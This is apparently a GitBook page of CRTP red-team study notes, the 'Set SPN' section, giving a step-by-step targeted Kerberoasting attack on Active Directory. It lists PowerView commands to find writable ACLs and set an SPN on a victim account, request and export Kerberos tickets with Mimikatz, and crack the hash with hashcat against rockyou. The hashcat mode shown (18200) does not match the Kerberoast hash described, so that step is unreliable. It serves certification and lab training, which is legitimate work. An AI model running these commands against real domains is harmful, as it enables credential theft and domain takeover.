CRTP Certified Red Team Professional
AuthorDiscordHTB Pro LabsHTB CPTSHTB CDSA
  • 👨‍🚒Certified Red Team Professional
  • LAB Access
  • 🔥Assume Breach Execution Cycle
  • 😆Prepare your VM
    • 😅PowerShell Detections
    • 🔥AMSI Bypass
    • 🙃Tools
    • CMD Commands
    • 🤣Escape the Machine
  • Data Visualization
    • BloodHound
    • AzureHound
    • RustHound
  • Domain Enumeration
    • 1️⃣Tools
    • 2️⃣Domain Enumeration
    • 3️⃣Users, Groups, Computers Enumeration
    • 4️⃣Shares Enumeration
    • 5️⃣GPO Enumeration
    • 6️⃣ACLs Enumeration
    • 7️⃣Domain Trusts
    • Domain Forests
    • 9️⃣Miscellaneous Enumeration
    • User Hunting
  • Local Privilege Escalation
    • Theory
    • Automation Tools
    • Techniques
  • Lateral Movement
    • Thinking
    • WinRS
    • PowerShell Remoting
    • Invoke-MimiKatz
    • CrackMapExec
  • Domain Persistence
    • 🔥Golden tickets
    • 🥈Silver Tickets
    • 💎Diamond Tickets
    • 🚒Skeleton Keys
    • DSRM
    • Custom SSP - Track logons
    • ACLs
      • 1️⃣AdminSDHolder
      • 2️⃣DCsync
      • 3️⃣WMI
      • 4️⃣Remote Powershell
      • 5️⃣Remote Registry
  • Domain Privilege Escalation
    • 🟢Kerberoast
    • 🟢AS-REPS Roasting
    • 🟢Set SPN
    • 🟢Unconstrained Delegation
    • 🟢Constrained Delegation
    • 🟢DNS Admins
    • Enterprise Admins
      • Child to parent - Trust tickets
      • Child to parent - krbtgt hash
    • 🟢Crossforest attacks
    • AD CS
    • 🟢Abuse MSSQL Servers
Powered by GitBook
On this page
  • Enumerate permissions for the group on ACL
  • Check if the user has SPN
  • Set SPN for the user
  • Request a TGS
  • Export ticket to disk for offline cracking
  • Request TGS hash for offline cracking hashcat
  • Crack the hash with hashcat

Was this helpful?

  1. Domain Privilege Escalation

Set SPN

Enumerate permissions for the group on ACL

Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl

Check if the user has SPN

. ./Powerview_dev.ps1
Get-DomainUser -Identity <username> | select samaccountname, serviceprincipalname

of

Get-NetUser | Where-Object {$_.servicePrincipalName}

Set SPN for the user

. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -Set @{serviceprincipalname=’ops/whatever1’}

Request a TGS

Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"

Export ticket to disk for offline cracking

Invoke-Mimikatz -Command '"Kerberos::list /export"'

Request TGS hash for offline cracking hashcat

Get-DomainUser -Identity <username> | Get-DomainSPNTicket | select -ExpandProperty Hash

Crack the hash with hashcat

Edit the hash by inserting '23' after the kerbrs

Hashcat -a 0 -m 18200 hash.txt rockyou.txt
PreviousAS-REPS RoastingNextUnconstrained Delegation

Last updated 1 year ago

Was this helpful?

🟢